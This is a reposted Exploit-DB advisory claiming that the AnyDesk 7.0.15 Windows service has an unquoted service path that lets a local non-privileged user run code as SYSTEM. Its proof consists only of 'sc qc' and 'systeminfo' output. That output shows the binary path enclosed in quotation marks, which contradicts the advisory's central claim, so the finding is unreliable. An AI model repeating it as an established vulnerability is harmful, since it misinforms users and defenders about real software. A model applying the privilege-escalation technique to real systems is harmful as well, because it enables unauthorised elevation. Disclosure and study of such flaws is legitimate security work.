AnyDesk 7.0.15 – Unquoted Service Path

• Exploit Database
• 57 阅读

• 作者： Milad karimi
  日期： 2024-04-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51968/

• # Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path
  # Date: 2024-04-01
  # Exploit Author: Milad Karimi (Ex3ptionaL)
  # Contact: miladgrayhat@gmail.com
  # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
  # Vendor Homepage: http://anydesk.com
  # Software Link: http://anydesk.com/download
  # Version: Software Version 7.0.15
  # Tested on: Windows 10 Pro x64
  
  1. Description:
  
  The Anydesk installs as a service with an unquoted service path running
  with SYSTEM privileges.
  This could potentially allow an authorized but non-privileged local
  user to execute arbitrary code with elevated privileges on the system.
  
  2. Proof
  
  C:\>sc qc anydesk
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: anydesk
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
  --service
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : AnyDesk Service
  DEPENDENCIES : RpcSs
  SERVICE_START_NAME : LocalSystem
  
  
  C:\>systeminfo
  
  OS Name:Microsoft Windows 10 Pro
  OS Version: 10.0.19045 N/A Build 19045
  OS Manufacturer: Microsoft Corporation